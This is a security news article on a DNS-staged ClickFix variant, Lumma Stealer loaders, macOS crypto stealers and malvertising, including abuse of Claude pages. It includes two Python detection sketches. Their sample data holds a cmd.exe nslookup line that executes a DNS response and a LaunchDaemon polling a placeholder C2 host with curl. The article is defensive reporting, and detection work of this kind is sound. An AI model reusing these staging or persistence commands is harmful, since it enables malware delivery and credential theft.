Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.
In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.
ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.
The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."
Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.
"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added.
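The staging chain Microsoft describes (cmd.exe invoking nslookup with an explicit external resolver, then filtering the output for the "Name:" line and executing it) leaves a recognisable process-creation footprint. The following detection sketch is an added example, not Microsoft's code; the event records, resolver addresses and domain names are constructed (RFC 5737 and .invalid ranges), and KNOWN_RESOLVERS stands in for an organisation's real DNS servers.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c for /f \"tokens=2\" %a in "
                "('nslookup svc.example.invalid 203.0.113.7 ^| findstr Name:') do %a"},
    {"parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup svc.example.invalid 203.0.113.7"},
    {"parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup intranet.corp.example"},
    {"parent": "powershell.exe", "image": "nslookup.exe",
     "cmdline": "nslookup www.example.com 10.0.0.53"},
]

# Hypothetical corporate resolvers; any other explicit server is "external".
KNOWN_RESOLVERS = {"10.0.0.53", "10.0.0.54"}

# nslookup <name> <server>; only dotted-quad servers are handled here (simplification).
NSLOOKUP_RE = re.compile(r"nslookup(?:\.exe)?\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})", re.I)
# Output piped through findstr/find to isolate the "Name:" response line.
FILTER_RE = re.compile(r"findstr[^|]*Name:|find\s+\"Name:\"", re.I)
# for /f loops execute each parsed token as a command.
LOOP_RE = re.compile(r"\bfor\s+/f\b", re.I)


def explicit_resolver(cmdline):
    """Return the DNS server explicitly passed to nslookup, or None."""
    m = NSLOOKUP_RE.search(cmdline)
    return m.group(2) if m else None


def score_event(ev):
    """List the staging indicators matched by one process-creation event."""
    hits = []
    cl = ev["cmdline"]
    server = explicit_resolver(cl)
    if server and server not in KNOWN_RESOLVERS:
        hits.append("nslookup against non-corporate resolver " + server)
    if FILTER_RE.search(cl):
        hits.append("output filtered for 'Name:' response")
    if LOOP_RE.search(cl) and "nslookup" in cl.lower():
        hits.append("for /f loop executing nslookup output")
    return hits


def triage(events):
    """Return (cmdline, hits) for events matching at least two indicators."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= 2:
            flagged.append((ev["cmdline"], hits))
    return flagged
```

A lone nslookup to an unfamiliar resolver is common enough in administration that it only scores one indicator; the combination with output filtering and a for /f loop is what separates staging from routine troubleshooting.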
Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots.
Lumma Stealer and CastleLoader Activity Intensifies
Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).
CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.
Additional campaigns have delivered a counterfeit NSIS installer that runs obfuscated VBA scripts before launching AutoIt components responsible for loading Lumma Stealer. The VBA component establishes scheduled tasks to ensure persistence.
"Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains."
One domain tied to CastleLoader infrastructure (“testdomain123123[.]shop”) was also identified as a Lumma Stealer command-and-control (C2) server, suggesting possible collaboration or shared services between operators. India has recorded the highest number of Lumma infections, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
"The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system."
Expanding Threat Landscape: RenEngine, macOS Stealers, and Malvertising
CastleLoader is not the only distribution mechanism in play. Since March 2025, campaigns using RenEngine Loader have spread Lumma Stealer through fake game cheats and pirated applications such as CorelDRAW. In these cases, RenEngine deploys Hijack Loader, which then installs the stealer. Kaspersky data shows primary impact in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.
Meanwhile, macOS users are increasingly being targeted. A campaign leveraging phishing and malvertising techniques has distributed Odyssey Stealer—a rebranded version of Poseidon Stealer and a fork of Atomic macOS Stealer (AMOS). The malware steals credentials and cryptocurrency wallet data from over 200 browser wallet extensions and multiple desktop wallet apps.
"Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines."
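The persistence Censys describes (a LaunchDaemon that polls its C2 every 60 seconds and hands commands to a shell) can be surfaced by inspecting launchd property lists. This triage helper is an added example, not Censys' or MacPaw's tooling; both plists are constructed, the .invalid host is a placeholder, and the interval and interpreter thresholds are assumptions a defender would tune.

```python
import plistlib

# Constructed LaunchDaemon plists (not real Odyssey artefacts); keys follow
# Apple's launchd.plist format.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.update</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://c2.example.invalid/tasks</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.periodic-daily</string>
  <key>ProgramArguments</key><array>
    <string>/usr/sbin/periodic</string><string>daily</string>
  </array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>3</integer></dict>
</dict></plist>"""

# Interpreters a stealer typically launches instead of a compiled binary.
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3"}
# Tokens suggesting the job fetches or decodes content at run time.
FETCHERS = ("curl", "wget", "nscurl", "osascript", "base64")
# Anything polling more often than this (seconds) is worth a look.
MAX_BENIGN_INTERVAL = 300


def assess_launch_daemon(raw):
    """Parse one launchd plist and return (label, list of reasons it looks suspicious)."""
    d = plistlib.loads(raw)
    args = d.get("ProgramArguments", [])
    reasons = []
    interval = d.get("StartInterval")
    if isinstance(interval, int) and interval <= MAX_BENIGN_INTERVAL:
        reasons.append(f"polls every {interval}s")
    if args and args[0] in INTERPRETERS:
        reasons.append("program is a script interpreter")
    if any(tok in " ".join(args) for tok in FETCHERS):
        reasons.append("arguments fetch or decode remote content")
    if d.get("RunAtLoad") and reasons:
        reasons.append("RunAtLoad set alongside the above")
    return d.get("Label", "?"), reasons
```

Run it over /Library/LaunchDaemons and /Library/LaunchAgents; a job that trips several reasons at once is a candidate for the "unusual Terminal activity" and beaconing TTPs the article lists later.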
Other campaigns include:
- Fake CAPTCHA pages on compromised websites tricking Windows users into running PowerShell commands that deploy StealC.
- Email phishing attacks using malicious SVG files inside password-protected ZIP archives to deliver the open-source .NET stealer Stealerium.
- Abuse of generative AI platforms such as Claude to host ClickFix instructions distributed via sponsored Google search results.
- Fake Medium articles impersonating Apple’s Support Team to spread macOS stealers via domains like “raxelpak[.]com.”
"The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection."
Malvertising abuse has also raised concerns. "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector."
macOS Threats on the Rise
Security researchers note a broader shift toward targeting Apple systems with advanced infostealers. According to recent analysis, macOS stealers now target more than 100 Chrome cryptocurrency extensions, and attackers are even acquiring legitimate Apple developer signatures to bypass Gatekeeper protections.
"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."
"The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."
